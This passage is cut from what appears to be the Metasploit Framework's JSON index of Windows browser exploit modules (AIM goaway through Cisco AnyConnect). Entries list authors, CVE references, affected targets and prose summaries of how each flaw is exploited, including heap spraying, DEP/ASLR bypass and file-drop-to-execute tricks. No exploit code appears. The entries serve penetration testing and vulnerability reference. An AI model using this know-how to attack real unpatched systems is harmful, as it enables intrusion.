"skape <mmiller@hick.org>",
"thief <thief@hick.org>"
],
"description": "This module exploits a flaw in the handling of AOL Instant\n Messenger's 'goaway' URI handler. An attacker can execute\n arbitrary code by supplying an overly sized buffer as the\n 'message' parameter. This issue is known to affect AOL Instant\n Messenger 5.5.",
"references": [
"CVE-2004-0636",
"OSVDB-8398",
"BID-10889",
"URL-http://www.idefense.com/application/poi/display?id=121&type=vulnerabilities"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows NT/2000/XP/2003 Automatic"
],
"mod_time": "2017-09-08 22:19:55 +0000",
"path": "/modules/exploits/windows/browser/aim_goaway.rb",
"is_install_path": true,
"ref_name": "windows/browser/aim_goaway",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/aladdin_choosefilepath_bof": {
"name": "Aladdin Knowledge System Ltd ChooseFilePath Buffer Overflow",
"full_name": "exploit/windows/browser/aladdin_choosefilepath_bof",
"rank": 300,
"disclosure_date": "2012-04-01",
"type": "exploit",
"author": [
"shinnai",
"b33f",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Aladdin Knowledge System's\n ActiveX component. By supplying a long string of data to the ChooseFilePath()\n function, a buffer overflow occurs, which may result in remote code execution\n under the context of the user.",
"references": [
"OSVDB-86723",
"EDB-22258",
"EDB-22301"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows XP with IE 6",
"Windows XP with IE 7",
"Windows XP with IE 8",
"Windows Vista with IE 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb",
"is_install_path": true,
"ref_name": "windows/browser/aladdin_choosefilepath_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/amaya_bdo": {
"name": "Amaya Browser v11.0 'bdo' Tag Overflow",
"full_name": "exploit/windows/browser/amaya_bdo",
"rank": 300,
"disclosure_date": "2009-01-28",
"type": "exploit",
"author": [
"dookie, original exploit by Rob Carter"
],
"description": "This module exploits a stack buffer overflow in the Amaya v11 Browser.\n By sending an overly long string to the \"bdo\"\n tag, an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2009-0323",
"OSVDB-55721",
"BID-33046",
"BID-33047"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Amaya Browser v11"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/amaya_bdo.rb",
"is_install_path": true,
"ref_name": "windows/browser/amaya_bdo",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/aol_ampx_convertfile": {
"name": "AOL Radio AmpX ActiveX Control ConvertFile() Buffer Overflow",
"full_name": "exploit/windows/browser/aol_ampx_convertfile",
"rank": 300,
"disclosure_date": "2009-05-19",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"Trancer <mtrancer@gmail.com>"
],
"description": "This module exploits a stack-based buffer overflow in AOL IWinAmpActiveX\n class (AmpX.dll) version 2.4.0.6 installed via AOL Radio website.\n By setting an overly long value to 'ConvertFile()', an attacker can overrun\n a buffer and execute arbitrary code.",
"references": [
"OSVDB-54706",
"BID-35028",
"EDB-8733"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/aol_ampx_convertfile.rb",
"is_install_path": true,
"ref_name": "windows/browser/aol_ampx_convertfile",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/aol_icq_downloadagent": {
"name": "America Online ICQ ActiveX Control Arbitrary File Download and Execute",
"full_name": "exploit/windows/browser/aol_icq_downloadagent",
"rank": 600,
"disclosure_date": "2006-11-06",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module allows remote attackers to download and execute arbitrary files\n on a user's system via the DownloadAgent function of the ICQPhone.SipxPhoneManager ActiveX control.",
"references": [
"CVE-2006-5650",
"OSVDB-30220",
"BID-20930",
"ZDI-06-037"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/aol_icq_downloadagent.rb",
"is_install_path": true,
"ref_name": "windows/browser/aol_icq_downloadagent",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/apple_itunes_playlist": {
"name": "Apple ITunes 4.7 Playlist Buffer Overflow",
"full_name": "exploit/windows/browser/apple_itunes_playlist",
"rank": 300,
"disclosure_date": "2005-01-11",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Apple ITunes 4.7\n build 4.7.0.42. By creating a URL link to a malicious PLS\n file, a remote attacker could overflow a buffer and execute\n arbitrary code. When using this module, be sure to set the\n URIPATH with an extension of '.pls'.",
"references": [
"CVE-2005-0043",
"OSVDB-12833",
"BID-12238"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 Pro English SP4",
"Windows XP Pro English SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/apple_itunes_playlist.rb",
"is_install_path": true,
"ref_name": "windows/browser/apple_itunes_playlist",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/apple_quicktime_marshaled_punk": {
"name": "Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution",
"full_name": "exploit/windows/browser/apple_quicktime_marshaled_punk",
"rank": 500,
"disclosure_date": "2010-08-30",
"type": "exploit",
"author": [
"Ruben Santemarta",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a memory trust issue in Apple QuickTime\n 7.6.7. When processing a specially-crafted HTML page, the QuickTime ActiveX\n control will treat a supplied parameter as a trusted pointer. It will\n then use it as a COM-type pUnknown and lead to arbitrary code execution.\n\n This exploit utilizes a combination of heap spraying and the\n QuickTimeAuthoring.qtx module to bypass DEP and ASLR. This module does not\n opt-in to ASLR. As such, this module should be reliable on all Windows\n versions.\n\n NOTE: The addresses may need to be adjusted for older versions of QuickTime.",
"references": [
"CVE-2010-1818",
"OSVDB-67705",
"URL-http://reversemode.com/index.php?option=com_content&task=view&id=69&Itemid=1"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Apple QuickTime Player 7.6.6 and 7.6.7 on Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/apple_quicktime_marshaled_punk.rb",
"is_install_path": true,
"ref_name": "windows/browser/apple_quicktime_marshaled_punk",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/apple_quicktime_mime_type": {
"name": "Apple QuickTime 7.7.2 MIME Type Buffer Overflow",
"full_name": "exploit/windows/browser/apple_quicktime_mime_type",
"rank": 300,
"disclosure_date": "2012-11-07",
"type": "exploit",
"author": [
"Pavel Polischouk",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a buffer overflow in Apple QuickTime 7.7.2. The stack\n based overflow occurs when processing a malformed Content-Type header. The module\n has been tested successfully on Safari 5.1.7 and 5.0.7 on Windows XP SP3.",
"references": [
"CVE-2012-3753",
"OSVDB-87088",
"BID-56438",
"URL-http://support.apple.com/kb/HT5581",
"URL-http://asintsov.blogspot.com.es/2012/11/heapspray.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Windows XP SP3 / Safari 5.1.7 / Apple QuickTime Player 7.7.2",
"Windows XP SP3 / Safari 5.0.5 / Apple QuickTime Player 7.7.2"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/apple_quicktime_mime_type.rb",
"is_install_path": true,
"ref_name": "windows/browser/apple_quicktime_mime_type",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/apple_quicktime_rdrf": {
"name": "Apple Quicktime 7 Invalid Atom Length Buffer Overflow",
"full_name": "exploit/windows/browser/apple_quicktime_rdrf",
"rank": 300,
"disclosure_date": "2013-05-22",
"type": "exploit",
"author": [
"Jason Kratzer",
"Tom Gallagher",
"Paul Bates",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Apple Quicktime. The flaw is\n triggered when Quicktime fails to properly handle the data length for certain\n atoms such as 'rdrf' or 'dref' in the Alis record, which may result in a buffer\n overflow when loading a specially crafted .mov file, and allows arbitrary\n code execution under the context of the current user.",
"references": [
"CVE-2013-1017",
"OSVDB-93625",
"BID-60097",
"URL-http://support.apple.com/kb/HT5770",
"ZDI-13-110"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Quicktime 7.7.3 with IE 8 on Windows XP SP3",
"Quicktime 7.7.2 with IE 8 on Windows XP SP3",
"Quicktime 7.7.1 with IE 8 on Windows XP SP3",
"Quicktime 7.7.0 with IE 8 on Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/apple_quicktime_rdrf.rb",
"is_install_path": true,
"ref_name": "windows/browser/apple_quicktime_rdrf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/apple_quicktime_rtsp": {
"name": "Apple QuickTime 7.1.3 RTSP URI Buffer Overflow",
"full_name": "exploit/windows/browser/apple_quicktime_rtsp",
"rank": 300,
"disclosure_date": "2007-01-01",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>",
"egypt <egypt@metasploit.com>"
],
"description": "This module exploits a buffer overflow in Apple QuickTime\n 7.1.3. This module was inspired by MOAB-01-01-2007. The\n Browser target for this module was tested against IE 6 and\n Firefox 1.5.0.3 on Windows XP SP0/2; Firefox 3 blacklists the\n QuickTime plugin.",
"references": [
"CVE-2007-0015",
"OSVDB-31023",
"BID-21829"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Apple QuickTime Player 7.1.3",
"Browser Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/apple_quicktime_rtsp.rb",
"is_install_path": true,
"ref_name": "windows/browser/apple_quicktime_rtsp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/apple_quicktime_smil_debug": {
"name": "Apple QuickTime 7.6.6 Invalid SMIL URI Buffer Overflow",
"full_name": "exploit/windows/browser/apple_quicktime_smil_debug",
"rank": 400,
"disclosure_date": "2010-08-12",
"type": "exploit",
"author": [
"Krystian Kloskowski",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a buffer overflow in Apple QuickTime\n 7.6.6. When processing a malformed SMIL URI, a stack-based buffer\n overflow can occur when logging an error message.",
"references": [
"CVE-2010-1799",
"OSVDB-66636",
"BID-41962",
"URL-http://secunia.com/advisories/40729/",
"URL-http://support.apple.com/kb/HT4290"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Apple QuickTime Player 7.6.6"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb",
"is_install_path": true,
"ref_name": "windows/browser/apple_quicktime_smil_debug",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/apple_quicktime_texml_font_table": {
"name": "Apple QuickTime 7.7.2 TeXML Style Element font-table Field Stack Buffer Overflow",
"full_name": "exploit/windows/browser/apple_quicktime_texml_font_table",
"rank": 300,
"disclosure_date": "2012-11-07",
"type": "exploit",
"author": [
"Arezou Hosseinzad-Amirkhizi",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Apple QuickTime. When handling\n a TeXML file, it is possible to trigger a stack-based buffer overflow, and then\n gain arbitrary code execution under the context of the user. This is due to the\n QuickTime3GPP.gtx component not handling certain Style subfields properly, such as the\n font-table field, which is used to trigger the overflow in this module. Because of\n QuickTime restrictions when handling font-table fields, only 0x31-0x39 bytes can be\n used to overflow, so at the moment DEP/ASLR bypass hasn't been provided. The module\n has been tested successfully on IE6 and IE7 browsers (Windows XP and Vista).",
"references": [
"OSVDB-87087",
"CVE-2012-3752",
"BID-56557",
"URL-http://support.apple.com/kb/HT5581"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"Firefox 3.5 on Windows XP SP3",
"Firefox 3.5.1 on Windows XP SP3"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb",
"is_install_path": true,
"ref_name": "windows/browser/apple_quicktime_texml_font_table",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ask_shortformat": {
"name": "Ask.com Toolbar askBar.dll ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/ask_shortformat",
"rank": 300,
"disclosure_date": "2007-09-24",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in Ask.com Toolbar 4.0.2.53.\n An attacker may be able to execute arbitrary code by sending an overly\n long string to the \"ShortFormat()\" method in askbar.dll.",
"references": [
"CVE-2007-5107",
"OSVDB-37735"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0/SP1 Pro English",
"Windows 2000 Pro English ALL"
],
"mod_time": "2017-09-08 22:19:55 +0000",
"path": "/modules/exploits/windows/browser/ask_shortformat.rb",
"is_install_path": true,
"ref_name": "windows/browser/ask_shortformat",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/asus_net4switch_ipswcom": {
"name": "ASUS Net4Switch ipswcom.dll ActiveX Stack Buffer Overflow",
"full_name": "exploit/windows/browser/asus_net4switch_ipswcom",
"rank": 300,
"disclosure_date": "2012-02-17",
"type": "exploit",
"author": [
"Dmitriy Evdokimov",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in ASUS Net4Switch's ipswcom.dll\n ActiveX control. A buffer overflow condition is possible in multiple places due\n to the use of the CxDbgPrint() function, which allows remote attackers to gain\n arbitrary code execution under the context of the user.",
"references": [
"CVE-2012-4924",
"OSVDB-79438",
"URL-http://dsecrg.com/pages/vul/show.php?id=417"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"IE 6 on Windows XP SP3",
"IE 7 on Windows XP SP3"
],
"mod_time": "2018-08-29 14:12:49 +0000",
"path": "/modules/exploits/windows/browser/asus_net4switch_ipswcom.rb",
"is_install_path": true,
"ref_name": "windows/browser/asus_net4switch_ipswcom",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/athocgov_completeinstallation": {
"name": "AtHocGov IWSAlerts ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/athocgov_completeinstallation",
"rank": 300,
"disclosure_date": "2008-02-15",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in AtHocGov IWSAlerts. When\n sending an overly long string to the CompleteInstallation() method of AtHocGovTBr.dll\n (6.1.4.36) an attacker may be able to execute arbitrary code. This\n vulnerability was silently patched by the vendor.",
"references": [
"OSVDB-94557"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/athocgov_completeinstallation.rb",
"is_install_path": true,
"ref_name": "windows/browser/athocgov_completeinstallation",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/autodesk_idrop": {
"name": "Autodesk IDrop ActiveX Control Heap Memory Corruption",
"full_name": "exploit/windows/browser/autodesk_idrop",
"rank": 300,
"disclosure_date": "2009-04-02",
"type": "exploit",
"author": [
"Elazar Broad <elazarb@earthlink.net>",
"Trancer <mtrancer@gmail.com>"
],
"description": "This module exploits a heap-based memory corruption vulnerability in\n Autodesk IDrop ActiveX control (IDrop.ocx) version 17.1.51.160.\n An attacker can execute arbitrary code by triggering a heap use after\n free condition using the Src, Background, PackageXml properties.",
"references": [
"OSVDB-53265",
"BID-34352",
"EDB-8560",
"URL-http://marc.info/?l=full-disclosure&m=123870112214736"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/autodesk_idrop.rb",
"is_install_path": true,
"ref_name": "windows/browser/autodesk_idrop",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/aventail_epi_activex": {
"name": "SonicWALL Aventail epi.dll AuthCredential Format String",
"full_name": "exploit/windows/browser/aventail_epi_activex",
"rank": 300,
"disclosure_date": "2010-08-19",
"type": "exploit",
"author": [
"Nikolas Sotiriu",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a format string vulnerability within version 10.0.4.x and\n 10.5.1 of the SonicWALL Aventail SSL-VPN Endpoint Interrogator/Installer ActiveX\n control (epi.dll). By calling the 'AuthCredential' method with a specially\n crafted Unicode format string, an attacker can cause memory corruption and\n execute arbitrary code.\n\n Unfortunately, it does not appear to be possible to indirectly re-use existing\n stack data for more reliable exploitation. This is due to several particulars\n about this vulnerability. First, the format string must be a Unicode string,\n which uses two bytes per character. Second, the buffer is allocated on the\n stack using the 'alloca' function. As such, each additional format specifier (%x)\n will add four more bytes to the size allocated. This results in the inability to\n move the read pointer outside of the buffer.\n\n Further testing showed that using specifiers that pop more than four bytes does\n not help. Any number of format specifiers will result in accessing the same value\n within the buffer.\n\n NOTE: It may be possible to leverage the vulnerability to leak memory contents.\n However, that has not been fully investigated at this time.",
"references": [
"OSVDB-67286",
"URL-http://sotiriu.de/adv/NSOADV-2010-005.txt"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"epi.dll v10.0.4.18 on Windows XP SP3"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/aventail_epi_activex.rb",
"is_install_path": true,
"ref_name": "windows/browser/aventail_epi_activex",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/awingsoft_web3d_bof": {
"name": "AwingSoft Winds3D Player SceneURL Buffer Overflow",
"full_name": "exploit/windows/browser/awingsoft_web3d_bof",
"rank": 200,
"disclosure_date": "2009-07-10",
"type": "exploit",
"author": [
"shinnai <shinnai@autistici.org>",
"Trancer <mtrancer@gmail.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a data segment buffer overflow within Winds3D Viewer of\n AwingSoft Awakening 3.x (WindsPly.ocx v3.6.0.0). This ActiveX is a plugin of\n AwingSoft Web3D Player.\n By setting an overly long value to the 'SceneURL' property, an attacker can\n overrun a buffer and execute arbitrary code.",
"references": [
"CVE-2009-4588",
"OSVDB-60017",
"EDB-9116",
"URL-http://www.rec-sec.com/2009/07/28/awingsoft-web3d-buffer-overflow/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/awingsoft_web3d_bof.rb",
"is_install_path": true,
"ref_name": "windows/browser/awingsoft_web3d_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/awingsoft_winds3d_sceneurl": {
"name": "AwingSoft Winds3D Player 3.5 SceneURL Download and Execute",
"full_name": "exploit/windows/browser/awingsoft_winds3d_sceneurl",
"rank": 600,
"disclosure_date": "2009-11-14",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits an untrusted program execution vulnerability within the\n Winds3D Player from AwingSoft. The Winds3D Player is a browser plugin for\n IE (ActiveX), Opera (DLL) and Firefox (XPI). By setting the 'SceneURL'\n parameter to the URL of an executable, an attacker can execute arbitrary\n code.\n\n Testing was conducted using plugin version 3.5.0.9 for Firefox 3.5 and\n IE 8 on Windows XP SP3.",
"references": [
"CVE-2009-4850",
"OSVDB-60049"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb",
"is_install_path": true,
"ref_name": "windows/browser/awingsoft_winds3d_sceneurl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/baofeng_storm_onbeforevideodownload": {
"name": "BaoFeng Storm mps.dll ActiveX OnBeforeVideoDownload Buffer Overflow",
"full_name": "exploit/windows/browser/baofeng_storm_onbeforevideodownload",
"rank": 300,
"disclosure_date": "2009-04-30",
"type": "exploit",
"author": [
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a buffer overflow in BaoFeng's Storm media Player ActiveX\n control. Versions of mps.dll including 3.9.4.27 and lower are affected. When passing\n an overly long string to the method \"OnBeforeVideoDownload\" an attacker can execute\n arbitrary code.",
"references": [
"CVE-2009-1612",
"OSVDB-54169",
"BID-34789",
"EDB-8579"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/baofeng_storm_onbeforevideodownload.rb",
"is_install_path": true,
"ref_name": "windows/browser/baofeng_storm_onbeforevideodownload",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/barcode_ax49": {
"name": "RKD Software BarCodeAx.dll v4.9 ActiveX Remote Stack Buffer Overflow",
"full_name": "exploit/windows/browser/barcode_ax49",
"rank": 300,
"disclosure_date": "2007-06-22",
"type": "exploit",
"author": [
"Trancek <trancek@yashira.org>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a stack buffer overflow in RKD Software Barcode Application\n ActiveX Control 'BarCodeAx.dll'. By sending an overly long string to the BeginPrint\n method of BarCodeAx.dll v4.9, an attacker may be able to execute arbitrary code.",
"references": [
"EDB-4094",
"OSVDB-37482",
"BID-24596",
"CVE-2007-3435"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0 English"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/windows/browser/barcode_ax49.rb",
"is_install_path": true,
"ref_name": "windows/browser/barcode_ax49",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/blackice_downloadimagefileurl": {
"name": "Black Ice Cover Page ActiveX Control Arbitrary File Download",
"full_name": "exploit/windows/browser/blackice_downloadimagefileurl",
"rank": 600,
"disclosure_date": "2008-06-05",
"type": "exploit",
"author": [
"shinnai",
"mr_me <steventhomasseeley@gmail.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module allows remote attackers to place arbitrary files on a user's file system\n by abusing the \"DownloadImageFileURL\" method in the Black Ice BIImgFrm.ocx ActiveX\n Control (BIImgFrm.ocx 12.0.0.0). Code execution can be achieved by first uploading the\n payload to the remote machine, and then uploading another mof file, which enables the Windows\n Management Instrumentation service to execute the binary. Please note that this module\n currently only works for Windows before Vista. Also, a similar issue is reported in\n BIDIB.ocx (10.9.3.0) within the Barcode SDK.",
"references": [
"CVE-2008-2683",
"OSVDB-46007",
"BID-29577",
"EDB-5750"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-08 22:19:55 +0000",
"path": "/modules/exploits/windows/browser/blackice_downloadimagefileurl.rb",
"is_install_path": true,
"ref_name": "windows/browser/blackice_downloadimagefileurl",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/c6_messenger_downloaderactivex": {
"name": "Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute",
"full_name": "exploit/windows/browser/c6_messenger_downloaderactivex",
"rank": 600,
"disclosure_date": "2008-06-03",
"type": "exploit",
"author": [
"Unknown",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability in Icona SpA C6 Messenger 1.0.0.1. The\n vulnerability is in the DownloaderActiveX Control (DownloaderActiveX.ocx). The\n insecure control can be abused to download and execute arbitrary files in the context of\n the currently logged-on user.",
"references": [
"CVE-2008-2551",
"OSVDB-45960",
"BID-29519"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/c6_messenger_downloaderactivex.rb",
"is_install_path": true,
"ref_name": "windows/browser/c6_messenger_downloaderactivex",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/ca_brightstor_addcolumn": {
"name": "CA BrightStor ARCserve Backup AddColumn() ActiveX Buffer Overflow",
"full_name": "exploit/windows/browser/ca_brightstor_addcolumn",
"rank": 300,
"disclosure_date": "2008-03-16",
"type": "exploit",
"author": [
"dean <dean@zerodaysolutions.com>"
],
"description": "The CA BrightStor ARCserve Backup ActiveX control (ListCtrl.ocx) is vulnerable to a stack-based\n buffer overflow. By passing an overly long argument to the AddColumn() method, a remote attacker\n could overflow a buffer and execute arbitrary code on the system.",
"references": [
"CVE-2008-1472",
"OSVDB-43214"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP2-SP3 IE 6.0/7.0"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb",
"is_install_path": true,
"ref_name": "windows/browser/ca_brightstor_addcolumn",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/chilkat_crypt_writefile": {
"name": "Chilkat Crypt ActiveX WriteFile Unsafe Method",
"full_name": "exploit/windows/browser/chilkat_crypt_writefile",
"rank": 600,
"disclosure_date": "2008-11-03",
"type": "exploit",
"author": [
"shinnai",
"jduck <jduck@metasploit.com>"
],
"description": "This module allows attackers to execute code via the 'WriteFile' unsafe method of\n Chilkat Software Inc's Crypt ActiveX control.\n\n This exploit is based on shinnai's exploit that uses an hcp:// protocol URI to\n execute our payload immediately. However, this method requires that the victim user\n be browsing as Administrator. Additionally, this method will not work on newer\n versions of Windows.\n\n NOTE: This vulnerability is still unpatched. The latest version of Chilkat Crypt at\n the time of this writing includes ChilkatCrypt2.DLL version 4.4.4.0.",
"references": [
"CVE-2008-5002",
"OSVDB-49510",
"BID-32073",
"EDB-6963"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/chilkat_crypt_writefile.rb",
"is_install_path": true,
"ref_name": "windows/browser/chilkat_crypt_writefile",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/cisco_anyconnect_exec": {
"name": "Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute",
"full_name": "exploit/windows/browser/cisco_anyconnect_exec",
"rank": 600,
"disclosure_date": "2011-06-01",
"type": "exploit",
"author": [
"bannedit <bannedit@metasploit.com>"
],
"description": "This module exploits a vulnerability in the Cisco AnyConnect VPN client\n vpnweb.ocx ActiveX control. This control is typically used to install the\n VPN client. An attacker can set the 'url' property which is where the control\n tries to locate the files needed to install the client.\n\n The control tries to download two files from the site specified within the\n 'url' property. One of these files will be stored in a temporary directory and\n executed.",
"references": [
"CVE-2011-2039",
"OSVDB-72714",
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=909",
"URL-http://www.cisco.com/en/US/products/products_security_advisory09186a0080b80123.shtml"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/cisco_anyconnect_exec.rb",
"is_install_path": true,
"ref_name": "windows/browser/cisco_anyconnect_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
